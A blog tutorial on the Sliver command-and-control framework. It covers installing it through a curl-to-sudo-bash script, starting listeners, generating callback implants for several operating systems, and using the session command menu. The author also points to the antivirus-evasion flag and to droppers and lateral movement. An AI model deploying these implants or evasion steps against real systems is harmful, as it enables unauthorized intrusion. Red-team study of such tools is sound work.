jJst a quick article on a C2 called Sliver, written by Bishop Fox. It's mostly used for Red Teaming, but it's also a pretty cool toy. So, if you're curious about what there's out there, stop by
It is just a basic article, because Sliver is quite large, so I won't cover it in total here, that's a task for you to do in your lab :)
So, what is Sliver, and why did I choose it for this demo ?. Let's talk a bit about it's features.
Features
Dynamic code generation
Compile-time obfuscation
Multiplayer-mode
Staged and Stageless payloads
Procedurally generated C2 over HTTP(S)
DNS canary blue team detection
Secure C2 over mTLS, WireGuard, HTTP(S), and DNS
Fully scriptable using JavaScript/TypeScript or Python
Local and remote process injection
Windows process migration
Windows user token manipulation
Anti-anti-anti-forensics
Let's Encrypt integration
In-memory .NET assembly execution
A couple I find important is dynamic code generation and obfuscation, Multiplayer mode, and some anti-forensics. That being said, ease of deployment, a relatively small footprint, and being able to run in server mode, and normal mode, on a laptop, was pretty important for me, because the same system can be used under different scenarios, and is easy to integrate / run along other tools.
It also features a menu structure I'm used to all in all, so it's fast to learn the basics, and that's a good thing.
It also seems it's pretty up to date, and being actively developed, another important thing, since we don't want old tools / tools that are not being updated on.
With features out of the way, on to the fun stuff. How do we install it ?
First we need some dependencies, Mingw and the Metasploit Framework (I'ts not required, but recommended to install this)
apt install mingw-w64 binutils-mingw-w64 g++-mingw-w64 metasploit-framework
Next up, we run the Linux install script
curl https://sliver.sh/install|sudo bashThe script is gonna install Sliver as a systemd service, it should be running after the script is done, but check it anyway.
aded (/etc/systemd/system/sliver.service; disabled; vendor prese>
Active: active (running) since Wed 2021-07-28 16:18:23 CEST; 7s ago
Main PID: 39030 (sliver-server)
Tasks: 11 (limit: 23835)
Memory: 16.6M
CPU: 98ms
CGroup: /system.slice/sliver.service
└─39030 /root/sliver-server daemon
If you get an "inactive", simply start Sliver with
systemctl start sliverSo, next we connect to it, and have a look around.
sliver
sliver
Connecting to localhost:31337 ...
███████╗██╗ ██╗██╗ ██╗███████╗██████╗
██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗
███████╗██║ ██║██║ ██║█████╗ ██████╔╝
╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗
███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║
╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝
All hackers gain deathtouch
[*] Server v1.4.20 - 7a38ddffb60d9205b1cef1bac430af742eff4e99
[*] Welcome to the sliver shell, please type 'help' for options
sliver >So, what can we do here ?. Why don't we start with the help command ?
sliver > help
Commands:
=========
clear clear the screen
exit exit the shell
help use 'help [command]' for command help
monitor Monitor threat intel platforms for Sliver implants
wg-config Generate a new WireGuard client config
wg-portfwd List ports forwarded by the WireGuard tun interface
wg-socks List socks servers listening on the WireGuard tun interface
Generic:
========
background Background an active session
canaries List previously generated canaries
dns Start a DNS listener
env List environment variables
generate Generate an implant binary
http Start an HTTP listener
https Start an HTTPS listener
implants List implant builds
jobs Job control
licenses Open source licenses
load-extension Load a sliver extension
loot Manage the server's loot store
mtls Start an mTLS listener
profiles List existing profiles
reaction Manage automatic reactions to events
regenerate Regenerate an implant
sessions Session management
stage-listener Start a stager listener
update Check for updates
use Switch the active session
version Display version information
websites Host static content (used with HTTP C2)
wg Start a WireGuard listener
Multiplayer:
============
players Manage operators
sliver >
Notice there are a couple of commands called listeners ? http, https and mtls ?.
Since this is a C2, a server for implants to connect back to, we need somethin they can connect to, a listener. For now stick with a basic one, and let's try http
sliver > http
[*] Starting HTTP :80 listener ...
[*] Successfully started job #1
Notice it said started job #1 ?. Try the jobs command and let's verify it.
sliver > jobs
ID Name Protocol Port
== ==== ======== ====
1 http tcp 80
sliver >
Okay, Heureeka, we got a listener configured :), now we need some implants, that is, the agents we're going to run on our targets.
Did you notice the generate command ?. First we need to generate a couple of implants, using the generate command. So, try and ask for help, and let's see what info we have on the generate command.
++ Formats ++
Supported output formats are Windows PE, Windows DLL, Windows Shellcode, Mach-O, and ELF. The output format is controlled with the --os and --format flags.
To output a 64bit Windows PE file (defaults to WinPE/64bit), either of the following command would be used:
generate --mtls foo.example.com
generate --os windows --arch 64bit --mtls foo.example.com
A Windows DLL can be generated with the following command:
generate --format shared --mtls foo.example.com
To output a MacOS Mach-O executable file, the following command would be used
generate --os mac --mtls foo.example.com
To output a Linux ELF executable file, the following command would be used:
generate --os linux --mtls foo.example.com
Usage:
======
generate [flags]
Flags:
======
-a, --arch string cpu architecture (default: amd64)
-c, --canary string canary domain(s)
-d, --debug enable debug features
-n, --dns string dns connection strings
-e, --evasion enable evasion features
-f, --format string Specifies the output formats, valid values are: 'exe', 'shared' (for dynamic libraries), 'service' (see `psexec` for more info) and 'shellcode' (windows only) (default: exe)
-h, --help display help
-H, --http string http(s) connection strings
-X, --key-exchange int wg key-exchange port (default: 1337)
-w, --limit-datetime string limit execution to before datetime
-x, --limit-domainjoined limit execution to domain joined machines
-F, --limit-fileexists string limit execution to hosts with this file in the filesystem
-z, --limit-hostname string limit execution to specified hostname
-y, --limit-username string limit execution to specified username
-k, --max-errors int max number of connection errors (default: 1000)
-m, --mtls string mtls connection strings
-N, --name string agent name
-p, --named-pipe string named-pipe connection strings
-o, --os string operating system (default: windows)
-P, --poll int attempt to poll every n second(s) (default: 1)
-j, --reconnect int attempt to reconnect every n second(s) (default: 60)
-s, --save string directory/file to the binary to
-b, --skip-symbols skip symbol obfuscation
-T, --tcp-comms int wg c2 comms port (default: 8888)
-i, --tcp-pivot string tcp-pivot connection strings
-t, --timeout int command timeout in seconds (default: 60)
-g, --wg string wg connection strings
Sub Commands:
=============
info Get information about the server's compiler
stager Generate a implant stager using MSF
sliver >
So, let's try and generate some basic implants. Remember we used a http listener ?, so we need to tell the system we want implants to go with that.
To output a 64bit Windows PE file (defaults to WinPE/64bit), either of the following command would be used:
generate --http <ip address of server>
generate --os windows --arch 64bit --http <ip address of server>
A Windows DLL can be generated with the following command:
generate --format shared --http <ip of server>
To output a MacOS Mach-O executable file, the following command would be used
generate --os mac --http <ip of server>
To output a Linux ELF executable file, the following command would be used:
generate --os linux --http <ip of server>Here's the basic commands for our listener. The files are gonna end up in the folder where Sliver is installed, but for more control over where they are placed, simply use the -s option. The only other option you need to set, is the OS option -o or --os. It can be windows, linux or mac depending on what you're targeting. At this stage, there's no implants for Android.
So, give them a try, and generate them. When you're done, move them into a folder on a webserver / Samba share / USB thumb drive and run them on the target system.
If you want to know what implants you've build and for what OS, simply use implants :
sliver > implants
Name OS/Arch Debug Format Command & Control
==== ======= ===== ====== =================
COOL_LAPTOP windows/amd64 false SHARED_LIB [1] http://10.x.x.x
RIDICULOUS_RISK windows/amd64 false EXECUTABLE [1] http://10.x.x.x
BITTER_CORMORANT linux/amd64 false EXECUTABLE [1] http://10.x.x.x
MAGIC_SENATOR darwin/amd64 false EXECUTABLE [1] http://10.x.x.x
MAXIMUM_SASH android/amd64 false EXECUTABLE [1] http://10.x.x.xHere's my test implants. Note that you can't set the names on the files at compile time, the system is going to generate them at random, but they can be renamed afterwards, to something that makes a bit more sense if you like.
So, when you run an implant, the shell in Sliver is gonna tell you, that you got a session back.
[*] Session #1 BITTER_CORMORANT - 10.x.x.x:51634 (xeon)So, run the sessions command, to get the session number.
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Last Check-in Health
== ==== ========= ============== ======== ======== ================ ============= ======
1 BITTER_CORMORANT http(s) 10.x.x.x:51634 xeon user linux/amd64 Wed, 28 Jul 2021 16:51:17 CEST [ALIVE]
sliver >
And let's connect to that session, and have a look at our implant menu.
sliver > use 1
[*] Active session BITTER_CORMORANT (1)
sliver (BITTER_CORMORANT) > Notice that the shell switched to BITTER_COMMORANT, it's to let us know we are on the agent running on that target. Since it's a Linux target, let's see what we got.
help
Commands:
=========
clear clear the screen
exit exit the shell
help use 'help [command]' for command help
monitor Monitor threat intel platforms for Sliver implants
wg-config Generate a new WireGuard client config
wg-portfwd List ports forwarded by the WireGuard tun interface
wg-socks List socks servers listening on the WireGuard tun interface
Generic:
========
background Background an active session
canaries List previously generated canaries
dns Start a DNS listener
env List environment variables
generate Generate an implant binary
http Start an HTTP listener
https Start an HTTPS listener
implants List implant builds
jobs Job control
licenses Open source licenses
load-extension Load a sliver extension
loot Manage the server's loot store
mtls Start an mTLS listener
profiles List existing profiles
reaction Manage automatic reactions to events
regenerate Regenerate an implant
sessions Session management
stage-listener Start a stager listener
update Check for updates
use Switch the active session
version Display version information
websites Host static content (used with HTTP C2)
wg Start a WireGuard listener
Multiplayer:
============
players Manage operators
Sliver:
=======
cat Dump file to stdout
cd Change directory
download Download a file
execute Execute a program on the remote system
execute-shellcode Executes the given shellcode in the sliver process
getgid Get session process GID
getpid Get session pid
getuid Get session process UID
ifconfig View network interface configurations
info Get info about session
kill Kill a session
ls List current directory
mkdir Make a directory
msf Execute an MSF payload in the current process
msf-inject Inject an MSF payload into a process
named-pipe Start a named pipe pivot listener
netstat Print network connection information
ping Send round trip message to implant (does not use ICMP)
pivots-list List pivots
portfwd In-band TCP port forwarding
procdump Dump process memory
ps List remote processes
pwd Print working directory
reconfig Reconfigure the active session
rm Remove a file or directory
screenshot Take a screenshot
shell Start an interactive shell
sideload Load and execute a shared object (shared library/DLL) in a remote process
ssh Run a SSH command on a remote host
tcp-pivot Start a TCP pivot listener
terminate Terminate a process on the remote system
upload Upload a file
whoami Get session user execution context
sliver (BITTER_CORMORANT) >
Now, we got a lot of command options, but the real important ones are under sliver:
Sliver:
=======
cat Dump file to stdout
cd Change directory
download Download a file
execute Execute a program on the remote system
execute-shellcode Executes the given shellcode in the sliver process
getgid Get session process GID
getpid Get session pid
getuid Get session process UID
ifconfig View network interface configurations
info Get info about session
kill Kill a session
ls List current directory
mkdir Make a directory
msf Execute an MSF payload in the current process
msf-inject Inject an MSF payload into a process
named-pipe Start a named pipe pivot listener
netstat Print network connection information
ping Send round trip message to implant (does not use ICMP)
pivots-list List pivots
portfwd In-band TCP port forwarding
procdump Dump process memory
ps List remote processes
pwd Print working directory
reconfig Reconfigure the active session
rm Remove a file or directory
screenshot Take a screenshot
shell Start an interactive shell
sideload Load and execute a shared object (shared library/DLL) in a remote process
ssh Run a SSH command on a remote host
tcp-pivot Start a TCP pivot listener
terminate Terminate a process on the remote system
upload Upload a file
whoami Get session user execution context
sliver (BITTER_CORMORANT) > A couple of usefull ones are : cat, cd, download, execute getgid, getpid, getuid, ps, pwd, upload, whoami and shell.
So, since this is a Linux system, they are pretty standard. Should you want to go back to the main menu, simply use the background command, and switch to another session.
Remember what target system you're on, since the commands will work differently for every system, just something to keep in mind.
This was just a quick intro, so go ahead and explore from here on. It's a really cool piece of toy. I know you're gonna wonder why the implant's are getting caught in Antivirus. Well, remember that -e switch to the generate command ?
But remember that this isn't gonna teach you priviledge escalation tactics on any kind of platform, that's for you to figure out. It is possible do do, and gain Admin / root, using this system, as well as latteral movement in a network. Again, this is something you won't find here, so I suggest you go read up on it. Remember LOLBins are your best frinend somethins, that and custom tools for the next stage :)
Also, there's nothing on making droppers / Word Macro droppers, drive-by-download websites and so on and so forth. For the same reason, that's for you to figure out. I just want to point out that Google is your best friend, and a lot of patience :)
Happy Hunting :)